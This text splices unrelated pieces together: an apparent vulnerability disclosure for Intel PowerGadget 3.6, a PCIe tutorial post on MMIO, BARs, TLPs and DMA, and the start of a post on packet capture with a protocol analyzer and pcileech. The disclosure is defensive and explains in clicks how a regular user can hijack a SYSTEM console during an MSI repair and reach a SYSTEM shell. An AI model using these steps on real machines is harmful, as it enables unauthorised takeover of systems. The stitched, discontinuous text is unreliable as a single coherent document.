Affected Versions: tested on PowerGadget_3.6.msi (a3834b2559c18e6797ba945d685bf174), file signed on ‎Monday, ‎February ‎1, ‎2021 9:43:20 PM (this seems to be the latest version), earlier versions might be affected as well.
Affected Platforms: Windows
Common Vulnerability Scoring System (CVSS) Base Score (CVSSv3): 7.8 HIGH
Risk score (CVSSv3): 7.8 HIGH  AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H&version=3.1)

I have reported this issue to Intel, but since the product has been marked End of Life since October 2023, it is not going to receive a security update nor a security advisory. Intel said that they are OK with me making this finding public, under the condition that I would emphasize that the product is EOL.

Description and steps to replicate:
On systems where Intel PowerGadget is installed from an MSI package, a local interactive regular user is able to run the MSI installer file in the "repair" mode and hijack the conhost.exe process (which is created by an instance of sc.exe the installer calls during the process) by quickly left-clicking on the console window that pops up for a split second in the late stage of the process. Left-clicking on the conhost.exe console window area freezes the console (meaning it prevents the sc.exe process from exiting). That process is running as NT AUTHORITY/SYSTEM. From there, it is possible to run a web browser by clicking on one of the links in the small GUI window that can be called by right-clicking on the console window bar and entering "properties". Once a web browser is spawn, attacker can call up the "Open" dialog and in that way get a fully working escape to explorer. From there they can, for example, browse through C:\Windows\System32 and right-click on cmd.exe and run it, obtaining as SYSTEM shell.

Now - an important detail - on most recent builds of Windows neither Edge nor Internet Explorer will spawn as SYSTEM (this is a mitigation from Microsoft); thus for successful exploitation another browser has to already be present in the system. As you can see I pick Chrome and then spawn an instance of cmd.exe, which turns out to be running as SYSTEM. Also, when doing this, DO NOT check "always use this app" in that dialog, as if you pick the wrong one (e.g. Edge or IE), it will be saved as the default http/https handler for SYSTEM and from then further attacks like this won't work if you want to repeat the POC - unless you reverse that change somewhere in the registry.

This class of Local Privilege Escalations is described by Mandiant in this article: https://www.mandiant.com/resources/blog/privileges-third-party-windows-installers.

To run the installer in repair mode, one needs to identify the proper MSI file. After normal installation, it is by default present in C:\Windows\Installer directory, under a random name. The proper file can be identified by attributes like control sum, size or "author" information - just as presented in the screenshot below:

The exploitation process is illustrated in the screenshots below, reflecting the the steps taken to attain a SYSTEM shell (no exploit development is required, the issue can be exploited using GUI).

Just for the record, the versions of Chrome and Windows this was successfully performed on:

Recommendation:
Technically, as per the reference, it is recommended to change the way the sc.exe is called, using the WixQuietExec() method (see the second reference). In such case the conhost.exe window will not be visible to the user, thus making it impossible to perform any GUI interaction and an escape.
I am, however, aware that this product is no longer maintained since October 2023 (https://www.intel.com/content/www/us/en/developer/articles/tool/power-gadget.html) and that includes security updates. Still, I believe a security advisory and CVE should be released just to make users and administrators aware why they need to replace PowerGadget with Intel Performance Counter Monitor.
Another possible (short-term) mitigation is to disable MSI (https://learn.microsoft.com/en-us/windows/win32/msi/disablemsi).

References:
https://www.mandiant.com/resources/blog/privileges-third-party-windows-installers
https://wixtoolset.org/docs/v3/customactions/qtexec/
https://www.intel.com/content/www/us/en/developer/articles/tool/power-gadget.html)
https://learn.microsoft.com/en-us/windows/win32/msi/disablemsi

PCIe Part 2 - All About Memory: MMIO, DMA, TLPs, and more!

Recap from Part 1

In Part 1 of this post series, we discussed ECAM and how configuration space accesses looked in both software and on the hardware packet network. In that discussion, the concepts of TLPs (Transaction Layer Packets) were introduced, which is the universal packet structure by which all PCIe data is moved across the hierarchy. We also discussed how these packets move similar to Ethernet networks in that an address (the BDF in this case) was used by routing devices to send Configuration Space packets across the network.

Configuration space reads and writes are just one of the few ways that I/O can be performed directly with a device. Given its “configuration” name, it is clear that its intention is not for performing large amounts of data transfer. The major downfall is its speed, as a configuration space packet can only contain at most 64-bits of data being read or written in either direction (often only 32-bits). With that tiny amount of usable data, the overhead of the packet and other link headers is significant and therefore bandwidth is wasted.

As discussed in Part 1, understanding memory and addresses will continue to be the key to understanding PCIe. In this post, we will look more in-depth into the much faster forms of device I/O transactions and begin to form an understanding of how software device drivers actually interface with PCIe devices to do useful work. I hope you enjoy!

NOTE: You do not need to be an expert in computer architecture or TCP/IP networking to get something from this post. However, knowing the basics of TCP/IP and virtual memory is necessary to grasp some of the core concepts of this post. This post also builds off of information from Part 1. If you need to review these, do so now!

Introduction to Data Transfer Methods in PCIe

Configuration space was a simple and effective way of communicating with a device by its BDF during enumeration time. It is a simple mode of transfer for a reason - it must be the basis by which all other data transfer methods are configured and made usable. Once the device is enumerated, configuration space has set up all of the information the device needs to perform actual work together with the host machine. Configuration space is still used to allow the host machine to monitor and respond to changes in the state of the device and its link, but it will not be used to perform actual high speed transfer or functionality of the device.

What we now need are data transfer methods that let us really begin to take advantage of the high-speed transfer throughput that PCIe was designed for. Throughput is a measurement of the # of bytes transferred over a given period of time. This means to maximize throughput, we must minimize the overhead of each packet to transfer the maximum number of bytes per packet. If we only send a few DWORDs (4-bytes each) per packet, like in the case of configuration space, the exceptional high-speed transfer capabilities of the PCIe link are lost.

Without further ado, let’s introduce the two major forms of high-speed I/O in PCIe:

  • Memory Mapped Input/Output (abbrev. MMIO) - In the same way the host CPU reads and writes memory to ECAM to perform config space access, MMIO can be used to map an address space of a device to perform memory transfers. The host machine configures “memory windows” in its physical address space that gives the CPU a window of memory addresses which magically translate into reads and writes directly to the device. The memory window is decoded inside the Root Complex to transform the reads and writes from the CPU into data TLPs that go to and from the device. Hardware optimizations allow this method to achieve a throughput that is quite a bit faster than config space accesses. However, its speed still pales in comparison to the bulk transfer speed of DMA.
  • Direct Memory Access (abbrev. DMA) - DMA is by far the most common form of data transfer due to its raw transfer speed and low latency. Whenever a driver needs to do a transfer of any significant size between the host and the device in either direction, it will assuredly be DMA. But unlike MMIO, DMA is initiated by the device itself, not the host CPU. The host CPU will tell the device over MMIO where the DMA should go and the device itself is responsible for starting and finishing the DMA transfer. This allows devices to perform DMA transactions without the CPU’s involvement, which saves a huge number of CPU cycles than if the device had to wait for the host CPU to tell it what to do each transfer. Due to its ubiquity and importance, it is incredibly valuable to understand DMA from both the hardware implementation and the software interface.

image-20240326175607439

High level overview of MMIO method

image-20240326175622906

High level overview of performing DMA from device to RAM. The device interrupts the CPU when the transfer to RAM is complete.

Introduction to MMIO

What is a BAR?

Because configuration space memory is limited to 4096 bytes, there’s not much useful space left afterwards to use for device-specific functionality. What if a device wanted to map a whole gigabyte of MMIO space for accessing its internal RAM? There’s no way that can fit that into 4096 bytes of configuration space. So instead, it will need to request what is known as a BAR (Base Address Register) . This is a register exposed through configuration space that allows the host machine to configure a region of its memory to map directly to the device. Software on the host machine then accesses BARs through memory read/write instructions directed to the BAR’s physical addresses, just as we’ve seen with the MMIO in ECAM in Part 1. Just as with ECAM, the act of reading or writing to this mapping of device memory will translate directly into a packet sent over the hierarchy to the device. When the device needs to respond, it will send a new packet back up through the hierarchy to the host machine.

image-20240311145856053

Device drivers running on the host machine access BAR mappings, which translate into packets sent through PCIe to the device.

When a CPU instruction reads the memory of a device’s MMIO region, a Memory Read Request Transaction Layer Packet (MemRd TLP) is generated that is transferred from the Root Complex of the host machine down to the device. This type of TLP informs the receiver that the sender wishes to read a certain number of bytes from the receiver. The expectation of this packet is that the device will respond with the contents at the requested address as soon as possible.

All data transfer packets sent and received in PCIe will be in the form of these Transaction Layer Packets. Recall from Part 1 that these packets are the central abstraction by which all communication between devices takes place in PCIe. These packets are reliable in the case of data transfer errors (similar to TCP in networking) and can be retried/resent if necessary. This ensures that data transfers are protected from the harsh nature of electrical interference that takes place in the extremely high speeds that PCIe can achieve. We will look closer at the structure of a TLP soon, but for now just think of these as regular network packets you would see in TCP.

image-20240311151834404

When the device responds, the CPU updates the contents of the register with the result from the device.

When the device receives the requestor packet, the device responds to the memory request with a Memory Read Response TLP. This TLP contains the result of the read from the device’s memory space given the address and size in the original requestor packet. The device marks the specific request packet and sender it is responding to into the response packet, and the switching hierarchy knows how to get the response packet back to the requestor. The requestor will then use the data inside the response packet to update the CPU’s register of the instruction that produced the original request.

In the meantime while a TLP is in transit, the CPU must wait until the memory request is complete and it cannot be interrupted or perform much useful work. As you might see, if lots of these requests need to be performed, the CPU will need to spend a lot of time just waiting for the device to respond to each request. While there are optimizations at the hardware level that make this process more streamlined, it still is not optimal to use CPU cycles to wait on data transfer to be complete. Hopefully you see that we need a second type of transfer, DMA, to address these shortcomings of BAR access.

Another important point here is that device memory does not strictly need to be for the device’s - RAM. While it is common to see devices with onboard RAM having a mapping of its internal RAM exposed through a BAR, this is not a requirement. For example, it’s possible that accessing the device’s BAR might access internal registers of the device or cause the device to take certain actions. For example, writing to a BAR is the primary way by which devices begin performing DMA. A core takeaway should be that device BARs are very flexible and can be used for both controlling the device or for performing data transfer to or from the device.

How BARs are Enumerated

Devices request memory regions from software using its configuration space. It is up to the host machine at enumeration time to determine where in physical memory that region is going to be placed. Each device has six 32-bit values in its configuration space (known as “registers”, hence the name Base Address Register) that the software will read and write to when the device is enumerated. These registers describe the length and alignment requirements of each of the MMIO regions the device wishes to allocate, one per possible BAR up to a total of six different regions. If the device wants the ability to map its BAR to above the 4GB space (a 64-bit BAR), it can combine two of the 32-bit registers together to form one 64-bit BAR, leaving a maximum of only three 64-bit BARs. This retains the layout of config space for legacy purposes.

img

A Type 0 configuration space structure, showing the 6 BARs.

TERMINOLOGY NOTE: Despite the acronym BAR meaning Base Address Register, you will see the above text refers to the memory window of MMIO as a BAR as well. This unfortunately means that the name of the register in configuration space is also the same name as the MMIO region given to the device (both are called BARs). You might need to read into the context of what is being talked about to determine if they mean the window of memory, or the actual register in config space itself.

BARs are another example of a register in config space that is not constant. In Part 1, we looked at some constant registers such as VendorID and DeviceID. But BARs are not constant registers, they are meant to be written and read by the software. In fact, the values written to the registers by the software are special in that writing certain kinds of values to the register will result in different functionality when read back. If you haven’t burned into your brain the fact that device memory is not always RAM and one can read values back different than what was written, now’s the time to do that.

Device memory can be RAM, but it is not always RAM and does not need to act like RAM!

What is DMA? Introduction and Theory

We have seen two forms of I/O so far, the config space access and the MMIO access through a BAR. The last and final form of access we will talk about is Direct Memory Access (DMA). DMA is by far the fastest method of bulk transfer for PCIe because it has the least transfer overhead. That is, the least amount of resources are required to transfer the maximum number of bytes across the link. This makes DMA absolutely vital for truly taking advantage of the high speed link that PCIe provides.

But, with great power comes great confusion. To software developers, DMA is a very foreign concept because we don’t have anything like it to compare to in software. For MMIO, we can conceptualize the memory accesses as instructions reading and writing from device memory. But DMA is very different from this. This is because DMA is asynchronous, it does not utilize the CPU in order to perform the transfer. Instead, as the name implies, the memory read and written comes and goes directly from system RAM. The only parties involved once DMA begins is the memory controller of the system’s main memory and the device itself. Therefore, the CPU does not spend cycles waiting for individual memory access. It instead just initiates the transfer and lets the platform complete the DMA on its own in the background. The platform will then inform the CPU when the transfer is complete, typically through an interrupt.

Let’s think for a second why this is so important that the DMA is performed asynchronously. Consider the case where the CPU is decrypting a huge number of files from a NVMe SSD on the machine. Once the NVMe driver on the host initiates DMA, the device is constantly streaming file data as fast as possible from the SSD’s internal storage to locations in system RAM that the CPU can access. Then, the CPU can use 100% of its processing power to perform the decryption math operations necessary to decrypt the blocks of the files as it reads data from system memory. The CPU spends no time waiting for individual memory reads to the device, it instead just hooks up the firehose of data and allows the device to transfer as fast as it possibly can, and the CPU processes it as fast as it can. Any extra data is buffered in the meantime within the system RAM until the CPU can get to it. In this way, no part of any process is waiting on something else to take place. All of it is happening simultaneously and at the fastest speed possible.

Because of its complexity and number of parts involved, I will attempt to explain DMA in the most straightforward way that I can with lots of diagrams showing the process. To make things even more confusing, every device has a different DMA interface. There is no universal software interface for performing DMA, and only the designers of the device know how that device can be told to perform DMA. Some device classes thankfully use a universally agreed upon interface such as the NVMe interface used by most SSDs or the XHCI interface for USB 3.0. Without a standard interface, only the hardware designer knows how the device performs DMA, and therefore the company or person producing the device will need to be the one writing the device driver rather than relying on the universal driver bundled with the OS to communicate with the device.

A “Simple” DMA Transaction - Step By Step

##

image-20240317134324189

The first step of our DMA journey will be looking at the initial setup of the transfer. This involves a few steps that prepare the system memory, kernel, and device for the upcoming DMA transfer. In this case, we will be setting up DMA in order to read in the contents of memory in our DMA Buffer which is present in system RAM and place it into the device’s on-board RAM at Target Memory. We have already chosen at this point to read this memory from the DMA Buffer into address 0x8000 on the device. The goal is to transfer this memory as quickly as possible from system memory to the device so it can begin processing it. Assume in this case that the amount of memory is many megabytes and MMIO would be too slow, but we will only show 32 bytes of memory for simplicity. This transfer will be the simplest kind of DMA transfer: Copy a known size and address of a block of memory from system RAM into device RAM.

Step 1 - Allocating DMA Memory from the OS

The first step of this process is Allocate DMA Memory from OS. This means that the device driver must make an OS API call to ask the OS to allocate a region of memory for the device to write data to. This is important because the OS might need to perform special memory management operations to make the data available to the device, such as removing protections or reorganizing existing allocations to facilitate the request.

DMA memory classically must be contiguous physical memory, which means that the device starts at the beginning of some address and length and read/writes data linearly from the start to end of the buffer. Therefore, the OS must be responsible for organizing its physical memory to create contiguous ranges that are large enough for the DMA buffers being requested by the driver. Sometimes, this can be very difficult for the memory manager to do for a system that has been running for a very long time or has limited physical memory. Therefore, enhancements in this space have allowed more modern devices to transfer to non-contiguous regions of memory using features such as Scatter-Gather and IOMMU Remapping. Later on, we will look at some of those features. But for now, we will focus only on the simpler contiguous memory case.

Once the requested allocation succeeds, the memory address is returned by the API and points to the buffer in system RAM. This will be the address that the device will be able to access memory through DMA. The addresses returned by an API intended for DMA will be given a special name; device logical address or just logical address. For our example, a logical address is identical to a physical address. The device sees the exact same view of physical memory that our OS sees, and there are no additional translations done. However, this might not always be the case in more advanced forms of transfer. Therefore it’s best to be aware that a device address given to you might not always be the same as its actual physical address in RAM.

Once the buffer is allocated, since the intention is to move data from this buffer to the device, the device driver will populate the buffer in advance with the information it needs to write to the device. In this example, data made of a repeating 01 02 03 04 pattern is being transferred to the device’s RAM.

Step 2 - Programming DMA addresses to the device and beginning transfer

The next step of the transfer is to prepare the device with the information it needs to perform the transaction. This is usually where the knowledge of the device’s specific DMA interface is most important. Each device is programmed in its own way, and the only way to know how the driver should program the device is to either refer to its general standard such as the NVMe Specification or to simply work with the hardware designer.

In this example, I am going to make up a simplified DMA interface for a device with only the most barebones features necessary to perform a transfer. In the figures below, we can see that this device is programmed through values it writes into a BAR0 MMIO region. That means that to program DMA for this device, the driver must write memory into the MMIO region specified by BAR0. The locations of each register inside this BAR0 region are known in advance by the driver writer and is integrated into the device driver’s code.

I have created four device registers in BAR0 for this example:

  • Destination Address - The address in the device’s internal RAM to write the data it reads from system RAM. This is where we will program our already-decided destination address of 0x8000.
  • Source Address - The logical address of system RAM that the device will read data from. This will be programmed the logical address of our DMA Buffer which we want the device to read.
  • Transfer Size - The size in bytes that we want to transfer.
  • Initiate Transfer - As soon as a 1 is written to this register, the device will begin DMAing between the addresses given above. This is a way that the driver can tell that the device is done populating the buffer and is ready to start the transfer. This is commonly known as a doorbell register.

image-20240317134403332

In the above diagram, the driver will need to write the necessary values into the registers using the mapped memory of BAR0 for the device (how it mapped this memory is dependent on the OS). The values in this diagram are as follows:

  • Target Memory - The memory we want to copy from the device will be at 0x00008000, which maps to a region of memory in the device’s on-board RAM. This will be our destination address.

  • DMA Buffer - The OS allocated the chunk of memory at 0x001FF000, so this will be our source address.

With this information, the driver can now program the values into the device as shown here:

image-20240326182317434

Now, at this point the driver has configured all the registers necessary to perform the transfer. The last step is to write a value to the Initiate Transfer register which acts as the doorbell register that begins the transfer. As soon as this value is written, the device will drive the DMA transfer and execute it independently of the driver or the CPU’s involvement. The driver has now completed its job of starting the transfer and now the CPU is free to do other work while it waits on the device to notify the system of the DMA completion.

Step 3 - Device performs DMA transaction

Now that the doorbell register has been written to by the driver, the device now takes over to handle the actual transfer. On the device itself, there exists a module called the DMA Engine responsible for handling and maintaining all aspects of the transaction. When the device was programmed, the register writes to BAR0 were programming the DMA engine with the information it needs to begin sending off the necessary TLPs on the PCIe link to perform memory transactions.

As discussed in a previous section, all memory operations on the PCIe link are done through Memory Write/Read TLPs. Here we will dive into what TLPs are sent and received by the DMA engine of the device while the transaction is taking place. Remember that it is easier to think of TLPs as network packets that are sending and receiving data on a single, reliable connection.

Interlude: Quick look into TLPs

Before we look at the TLPs on the link, let’s take a closer look at a high level overview of packet structure itself.

image-20240326180710226

Here are two TLPs shown for a memory read request and response. As discussed, TLPs for memory operations utilize a request and response system. The device performing the read will generate a Read Request TLP for a specific address and length (in 4-byte DWORDs), then sit back and wait for the completion packets to arrive on the link containing the response data.

We can see there is metadata related to the device producing the request, the Requester, as well as a unique Tag value. This Tag value is used to match a request with its completion. When the device produces the request, it tags the TLP with a unique value to track a pending request. The value is chosen by the sender of the request, and it is up to the sender to keep track of the Tags it assigns.

As completions arrive on the link, the Tag value of the completion allows the device to properly move the incoming data to the desired location for that specific transfer. This system allows there to be multiple unique outstanding transfers from a single device that are receiving packets interleaved with each other but still remain organized as independent transfers.

Also inside the packet is the information necessary to enable the PCIe switching hierarchy to determine where the request and completions need to go. For example, the Memory Address is used to determine which device is being requested for access. Each device in the hierarchy has been programmed during enumeration time to have unique ranges of addresses that each device owns. The switching hierarchy looks at the memory address in the packet to determine where that packet needs to go in order to access that address.

Once the device receives and processes the request, the response data is sent back in the form of a Completion TLP. The completion, or “response” packet, can and often will be fragmented into many smaller TLPs that send a part of the overall response. This is because there is a Maximum Payload Size (MPS) that was determined could be handled by the device and bus during enumeration time. The MPS is configurable based on platform and device capability and is a power of 2 size starting from 128 and going up to a potential 4096. Typically this value is around 256 bytes, meaning large read request will need to be split into many smaller TLPs. Each of these packets have a field that dictates what offset of the original request the completion is responding to and in the payload is the chunk of data being returned.

There is a common misconception that memory TLPs use BDF to address where packets need to go. The request uses only a memory address to direct a packet to its destination, and its the responsibility of the bridges in-between the device and destination to get that packet to its proper location. However, the completion packets do use the BDF of the Requester to return the data back to the device that requested it.

Below is a diagram of a memory read and response showcasing that requests use an address to make requests and completions use the BDF in the Requester field of the request to send a response:

image-20240326183419841 image-20240326183429287

Now back to the actual transaction…

Let’s look at what all is sent and received by the DMA Engine in order to perform our request. Since we requested 32 bytes of data, there will only be one singular Memory Read Request and a singular Memory Read Completion packet with the response. For a small exercise for your understanding, stop reading forward and think for a moment which device is going to send and receive which TLP in this transaction. Scroll up above if you need to look at the diagrams of Step 2 again.

Now, let’s dig into the actual packets of the transfer. While I will continue to diagram this mock example out, I thought that for this exercise it might be fun and interesting to the reader to actually see what some of these TLPs look like when a real transaction is performed.

In the experiment, I set up the same general parameters as seen above with a real device and initiate DMA. The device will send real TLPs to read memory from system RAM and into the device. Therefore, you will be able to see a rare look into an example of the actual TLPs sent when performing this kind of DMA which are otherwise impossible to see in transit without one of these analyzers.

To view this experiment, follow this link to the companion post: Experiment - Packet Dumping PCIe DMA TLPs with a Protocol Analyzer and Pcileech

Here is a block diagram of the memory read request being generated by the device and how the request traverses through the hierarchy.

image-20240326182111190

ERRATA: 0x32 should be 32

The steps outlined in this diagram are as follows:

  • DMA Engine Creates TLP - The DMA engine recognizes that it must read 32 bytes from 0x001FF000. It generates a TLP that contains this request and sends it out via its local PCIe link.
  • TLP Traverses Hierarchy - The switching hierarchy of PCIe moves this request through bridge devices until it arrives at its destination, which is the Root Complex. Recall that the RC is responsible for handling all incoming packets destined for accessing system RAM.
  • DRAM Controller is Notified - The Root Complex internally communicates with the DRAM controller which is responsible for actually accessing the memory of the system DRAM.
  • Memory is Read from DRAM - The given length of 32 bytes is requested from DRAM at address 0x001FF000 and returned to the Root Complex with the values 01 02 03 04…

Try your best not to be overwhelmed by this information, because I do understand there’s a lot going on just for the single memory request TLP. All of this at a high level is boiling down to just reading 32 bytes of memory from address 0x001FF000 in RAM. How the platform actually does that system DRAM read by communicating with the DRAM controller is shown just for your interest. The device itself is unaware of how the Root Complex is actually reading this memory, it just initiates the transfer with the TLP.

NOTE: Not shown here is the even more complicated process of RAM caching. On x86-64, all memory accesses from devices are cache coherent, which means that the platform automatically synchronizes the CPU caches with the values being accessed by the device. On other platforms, such as ARM platforms, this is an even more involved process due to its cache architecture. For now, we will just assume that the cache coherency is being handled automatically for us and we don’t have any special worries regarding it.

When the Root Complex received this TLP, it marked internally what the Requester and Tag were for the read. While it waits for DRAM to respond to the value, the knowledge of this request is pended in the Root Complex. To conceptualize this, think of this as an “open connection” in a network socket. The Root Complex knows what it needs to respond to, and therefore will wait until the response data is available before sending data back “over the socket”.

Finally, the Completion is sent back from the Root Complex to the device. Note the Destination is the same as the Requester:

image-20240317144026603

Here are the steps outlined with the response packet as seen above:

  • Memory is read from DRAM - 32 bytes are read from the address of the DMA Buffer at 0x001FF000 in system DRAM by the DRAM controller.
  • DRAM Controller Responds to Root Complex - The DRAM controller internally responds with the memory requested from DRAM to the Root Complex
  • Root Complex Generates Completion - The Root Complex tracks the transfer and creates a Completion TLP for the values read from DRAM. In this TLP, the metadata values are set based on the knowledge that the RC has of the pending transfer, such as the number of bytes being sent, the Tag for the transfer, and the destination BDF that was copied from the Requester field in the original request.
  • DMA Engine receives TLP - The DMA engine receives the TLP over the PCIe link and sees that the Tag matches the same tag of the original request. It also internally tracks this value and knows that the memory in the payload should be written to Target Memory, which is at 0x8000 in the device’s internal RAM.
  • Target Memory is Written - The values in the device’s memory are updated with the values that were copied out of the Payload of the packet.
  • System is Interrupted - While this is optional, most DMA engines will be configured to interrupt the host CPU whenever the DMA is complete. This gives the device driver a notification when the DMA has been successfully completed by the device.

Again, this is a lot of steps involved with handling just this single completion packet. However, again you can think of this whole thing as simply a “response of 32 bytes is received from the device’s request.” The rest of these steps are just to show you what a full end-to-end of this response processing would look like.

From here, the device driver is notified that the DMA is complete and the device driver’s code is responsible for cleaning up the DMA buffers or storing them away for use next time.

After all of this work, we have finally completed a single DMA transaction! And to think that this was the “simplest” form of a transfer I could provide. With the addition of IOMMU Remapping and Scatter-Gather Capability, these transactions can get even more complex. But for now, you should have a solid understanding of what DMA is all about and how it actually functions with a real device.

Outro - A Small Note on Complexity

If you finished reading this post and felt that you didn’t fully grasp all of the concepts thrown at you or feel overwhelmed by the complexity, you should not worry. The reason these posts are so complex is that it not only spans a wide range of topics, but it also spans a wide range of professions as well. Typically each part of this overall system has distinct teams in the industry who focus only on their “cog” in this complex machine. Often hardware developers focus on the device, driver developers focus on the driver code, and OS developers focus on the resource management. There’s rarely much overlap between these teams, except when handing off at their boundary so another team can link up to it.

These posts are a bit unique in that they try to document the system as a whole for conceptual understanding, not implementation. This means that where team boundaries are usually drawn, these posts simply do not care. I encourage readers who find this topic interesting to continue to dig into it on their own time. Maybe you can learn a thing about FPGAs and start making your own devices, or maybe you can acquire a device and start trying to reverse engineer how it works and communicate with it over your own custom software.

An insatiable appetite for opening black boxes is what the “hacker” mindset is all about!

Conclusion

I hope you enjoyed this deep dive into memory transfer on PCIe! While I have covered a ton of information in this post, the rabbit hole always goes deeper. Thankfully, by learning about config space access, MMIO (BARs), and DMA, you have now covered every form of data communication available in PCIe! For every device connected to the PCIe bus, the communication between the host system and device will take place with one of these three methods. All of the setup and configuration of a device’s link, resources, and driver software is to eventually facilitate these three forms of communication.

A huge reason this post took so long to get out there was due to just the sheer amount of information that I would have to present to a reader in order to make sense of all of this. It’s hard to decide what is worth writing about and what is so much depth that the understanding gets muddied. That decision paralysis has made the blog writing process take much longer than I intended. That, combined with a full time job, makes it difficult to find the time to get these posts written.

In the upcoming posts, I am looking forward to discussing some or all of the following topics:

  • PCIe switching/bridging and enumeration of the hierarchy
  • More advanced DMA topics, such as DMA Remapping
  • Power management; how devices “sleep” and “wake”
  • Interrupts and their allocation and handling by the platform/OS
  • Simple driver development examples for a device

As always, if you have any questions or wish to comment or discuss an aspect of this series, you can best find me by “@gbps” in the #hardware channel on my discord, the Reverse Engineering discord: https://discord.com/invite/rtfm

Please look forward to future posts!

-Gbps

Experiment - Packet Dumping PCIe DMA TLPs with a Protocol Analyzer and Pcileech

Introduction

In this post, I will be going over a small experiment where we hook up a PCIe device capable of performing arbitrary DMA to a Keysight PCIe 3.0 Protocol Analyzer to intercept and observe the Transaction Layer Packets (TLPs) that travel over the link. The purpose of this experiment is to develop a solid understanding of how memory transfer takes place under PCIe.

This is post is part of a series on PCIe for beginners. I encourage you to read the other posts before this one!

Background: On Why PCIe Hardware is so Unapproachable

There are a couple recurring themes of working with PCIe that make it exceptionally difficult for beginners: access to information and cost. Unlike tons of technologies we use today in computing, PCIe is mostly a “industry only” club. Generally, if you do not or have not worked directly in the industry with it, it is unlikely that you will have access to the information and tools necessary to work with it. This is not intentionally a gatekeeping effort as much as it is that the field serves a niche group of hardware designers and the tools needed to work with it are generally prohibitively expensive for a single individual.

The data transfer speeds that the links work near the fastest cutting-edge data transfer speeds available to the time period in which the standard is put into practice. The most recent standard of PCIe 6.2 has proof of concept hardware that operates at a whopping 64 GigaTransfers/s (GT/s) per lane. Each transfer will transfer one bit, so that means that a full 16 lane link is operating in total at a little over 1 Terabit of information transfer per second. Considering that most of our TCP/IP networks are still operating at 1 Gigabit max and the latest cutting-edge USB4 standards operates at 40 Gigabit max, that is still an order of magnitude faster than the transfer speeds we ever encounter in our day-to-day.

To build electronic test equipment, say an oscilloscope, that is capable of analyzing the electrical connection of a 64GT/s serial link is an exceptional feat in 2024. These devices need to contain the absolute most cutting edge components, DACs, and FPGAs/ASICs being produced on the market to even begin to be able to observe the speed by which the data travels over a copper trace without affecting the signal. Cutting edge dictates a price, and that price easily hits many hundreds of thousands of USD quickly. Unless you’re absolutely flushed with cash, you will only ever see one of these in a hardware test lab at a select few companies working with PCIe links.

PCIe 6.0 transmitter compliance test solution

Shown: An incredibly expensive PCIe 6.0 capable oscilloscope. Image © Keysight Technologies

But, all is not lost. Due to a fairly healthy secondhand market for electronics test equipment and recycling, it is still possible for an individual to acquire a PCIe protocol interceptor and analyzer for orders of magnitude less than what they were sold for new. The tricky part is finding all of the different parts of the collective set that are needed. An analyzer device is not useful without a probe to intercept traffic, nor is it useful without the interface used to hook it up to your PC or the license to the software that runs it. All of these pieces unfortunately have to align to recreate a functioning device.

It should be noted that these protocol analyzers are special in that they can see everything happening on the link. They have the capability to analyze each of the three layers of the PCIe link stack: the Physical, Data Link, and Transaction layer. If you’re not specifically designing something focused within the Physical or Data Link layer, these captures are not nearly as important as the Transaction layer. It is impossible for a PC platform to “dump” PCIe traffic like network or USB traffic. The cost of adding such a functionality would well outweigh the benefit.

My New PCIe 3.0 Protocol Analyzer Setup

After a year or so of looking, I was finally lucky enough to find all of the necessary pieces for a PCIe 3.0 Protocol Analyzer on Ebay at the same time, so I took the risk and purchased each of these components for myself (for what I believe was a fantastic deal compared to even the used market). I believe I was able to find these devices listed at all because they were approaching about a decade old and, at max, support PCIe 3.0. As newer consumer devices on the market are quickly moving to 4.0 and above, I can guess that this analyzer was probably from a lab that has recently upgraded to a newer spec. This however does not diminish the usefulness of a 3.0 analyzer, as all devices of a higher spec are backwards compatible with older speeds and still a huge swath of devices on the market in 2024 are still PCIe 3.0. NVMe SSDs and consumer GFX cards have been moving to 4.0 for the enhanced speed, but they still use the same feature set as 3.0. Most newer features are reserved for the server space.

Finding historical pricing information for these devices and cards is nearly impossible. You pretty much just pay whatever the company listing the device wants to get rid of it for. It’s rare to find any basis for what these are really “worth”.

Here is a listing of my setup, with the exact component identifiers and listings that were necessary to work together. If you were to purchase one of these, I do recommend this setup. Note that cables and cards similar but not exactly the same identifiers might not be compatible, so be exact!

  • Agilent/Keysight U4301A PCI Express Protocol Analyzer Module - $1,800 USD (bundled with below)
    • This is the actual analyzer module from Agilent that supports PCIe 3.0. This device is similar to a 1U server that must rack into a U4002A Digital Tester Chassis or a M9502A Chassis.
    • The module comes installed with its software license on board. You do not need to purchase a separate license for its functionality.
    • I used the latest edition of Windows 11 for the software.
    • This single module can support up to 8 lanes of upstream and downstream at the same time. Two modules in a chassis would be required for 16 lanes of upstream and downstream.
    • https://www.keysight.com/us/en/product/U4301A/pcie-analyzer.html
  • Agilent/Keysight U4002A Digital Tester Chassis - $1,800 USD (bundled with above)
    • This is the chassis that the analyzer module racks into. The chassis has an embedded controller module on it at the bottom which will be the component that hooks up to the PC. This is in charge of controlling the U4301A module and collects and manages its data for sending back to the PC.
  • One Stop Systems OSS Host PCIe Card 7030-30048-01 A - $8 USD
    • The host card that slots into a PCIe slot on the host PC’s motherboard. The cord and card should be plugged in and the module powered on for at least 4 minutes prior to booting the host PC.
  • Molex 74546-0403 PCIe x4 iPass Cable - $15.88 USD
    • The cord that connects the embedded controller module in the chassis to the PC through the OSS Host PCIe card.
  • Agilent/Keysight U4321 -66408 PCIe Interposer Probe Card With Cables And Adapter - $1,850 USD
    • This is the interposer card that sits between the device under test and the slot on the target machine. This card is powered by a 12V DC power brick.
    • This is an x8 card, so it can at the max support 8 lanes of PCIe. Devices under test will negotiate down to 8 lanes if needed, so this is not an isssue.
    • https://www.keysight.com/us/en/product/U4321A/pcie-interposer-probe.html
  • At least 2x U4321-61601 Solid Slot Interposer Cables are needed to attach to the U4321. 4x are needed for bidirectional x8 connection. These were bundled along with the above.

  • Total Damage: Roughly ~$4000 USD.

image-20240326142902108

Shown: My U4301A Analyzer hooked up to my host machine

FPGA Setup for DMA with Pcileech

It’s totally possible to connect an arbitrary PCIe device, such as a graphics card, and capture its DMA for this experiment. However, I think it’s much nicer to create the experiment by being able to issue arbitrary DMA from a device and observing its communication under the analyzer. That way there’s not a lot of chatter from the regular device’s operation happening on the link that affects the results.

